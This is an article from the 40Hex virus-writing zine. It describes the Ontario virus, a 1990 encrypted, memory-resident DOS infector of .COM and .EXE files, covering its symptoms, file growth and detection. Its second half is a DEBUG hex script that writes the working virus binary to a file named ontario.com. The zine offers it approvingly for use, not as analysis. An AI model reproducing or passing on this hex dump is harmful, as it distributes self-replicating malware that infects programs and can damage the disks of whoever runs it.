40Hex Volume 1 Issue 2 0008 The Ontario Virus Here a quick nice little virus from our boyz up north. V Status: Rare Discovered: July, 1990 Symptoms: .COM & .EXE growth; decrease in system and free memory; hard disk errors in the case of extreme infections Origin: Ontario, Canada Eff Length: 512 Bytes Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+, NAV Removal Instructions: SCAN /D, or Delete infected files General Comments: The Ontario Virus was isolated by Mike Shields in Ontario, Canada in July, 1990. The Ontario virus is a memory resident infector of .COM, .EXE, and overlay files. It will infect COMMAND.COM. The first time a program infected with the Ontario Virus is executed, it will install itself memory resident above the top of system memory but below the 640K DOS boundary. Total system memory and free memory will be decreased by 2,048 bytes. At this time, the virus will infect COMMAND.COM on the C: drive, increasing its length by 512 bytes. Each time an uninfected program is executed on the system with the virus memory resident, the program will become infected with the viral code located at the end of the file. For .COM files, they will increase by 512 bytes in all cases. For .EXE and overlay files, the file length increase will be 512 - 1023 bytes. The difference in length for .EXE and overlay files is because the virus will fill out the unused space at the end of the last sector of the uninfected file with random data (usually a portion of the directory) and then append itself to the end of the file at the next sector. Systems using a sector size of more than 512 bytes may notice larger file increases for infected files. Infected files will always have a file length that is a multiple of the sector size on the disk. In the case of extreme infections of the Ontario Virus, hard disk errors may be noticed. Ontario uses a complex encryption routine, and a simple identification string will not identify this virus. ------------------------------------------------------------------------------ n ontario.com e 0100 E9 1D 00 1D 66 65 63 74 65 64 20 50 72 6F 67 72 e 0110 61 6D 2E 20 0D 0A 24 BA 02 01 B4 09 CD 21 CD 20 e 0120 90 E8 E9 01 93 84 7B D9 F8 69 7C 3C 84 7B B6 A5 e 0130 71 60 0F CB 65 B7 BB 0A A3 07 55 97 7F 86 BE 9A e 0140 FF 84 55 0D E5 84 79 AA F7 1A 79 86 F7 47 30 0A e 0150 A0 05 55 87 7B 04 7B 25 69 84 56 04 7B 27 69 84 e 0160 F5 44 75 9B F0 71 48 7B C2 80 79 78 88 20 F5 5D e 0170 81 43 7D 00 7B FB 7B 27 FD 84 80 3C 84 CF B6 A5 e 0180 64 9A 7C 8F 96 F0 77 09 CD FF 7B 3B 7B 85 2C 78 e 0190 DE 21 B8 08 BB AA 7A 82 06 84 91 6F 6E CD 15 B9 e 01A0 84 7B 0E 86 3B 4B FB 78 30 F1 6F B8 78 F0 6B B8 e 01B0 84 F1 72 8A 64 3E A6 85 93 8D 7B 4B 93 81 7B AA e 01C0 84 AA 7B 86 7D 9A 29 D5 28 D4 C3 84 38 6C 5D 85 e 01D0 09 9C 8D 45 7A F0 70 04 9A 7A C3 85 38 6C 6D 85 e 01E0 09 8C C3 86 46 6C 75 85 08 87 92 86 7A 0F A3 8A e 01F0 64 3C 7B D3 93 7B 7B 0D 75 80 79 0D 6D 82 79 3E e 0200 73 86 C2 9F 7B 30 44 6C 97 84 09 CC FA BA 73 86 e 0210 36 DE 0F BD DB 8D 79 BE 7D 8F 79 F0 4C B7 A9 B7 e 0220 B2 3C 79 C6 93 4B 7B F6 50 B9 7B 64 0C A2 2B 25 e 0230 73 86 D8 FF 7B 25 71 86 D8 F9 7B DC 56 87 7B 42 e 0240 7D 8C 79 6D D8 8D 79 26 70 86 90 CD EB 07 45 98 e 0250 79 85 0E 87 92 01 7B 25 77 86 C2 84 79 73 9A D4 e 0260 29 35 7F 57 B1 57 93 87 B9 AF 7D 94 79 D4 DA 98 e 0270 79 27 00 84 DA 9A 79 81 6B 84 D8 F9 7B DC D8 9A e 0280 79 43 7D 98 79 85 7B 7B 7D 88 79 DD 21 3C 7B C6 e 0290 93 E7 7B F6 3C 04 4D 7C 7A 8C 48 44 F5 5C DB E8 e 02A0 7F 8A 64 8A 7C 26 97 85 48 72 C4 A0 79 D3 C2 84 e 02B0 79 78 88 20 C5 AC 79 6C 21 84 21 3D 7B 86 CF C4 e 02C0 93 B7 7B F6 6C B7 B2 B7 A9 3C 7B C6 93 A3 7B F6 e 02D0 70 3E 73 86 C2 9F 7B 30 3B 6C 61 84 F0 92 7D 86 e 02E0 F0 8A 7F 86 C3 85 2C 6C 77 84 CF BA 93 83 7B DC e 02F0 20 DD 21 9B 7C 47 E7 AA 84 9A 7B 86 B8 C7 41 D8 e 0300 38 CB 36 C9 3A CA 3F AA 38 CB 36 84 84 5E 56 2E e 0310 8A 84 E8 01 B9 E8 01 F6 D0 2E 30 04 46 E2 F8 C3 rcx 220 w q ------------------------------------------------------------------------------ HR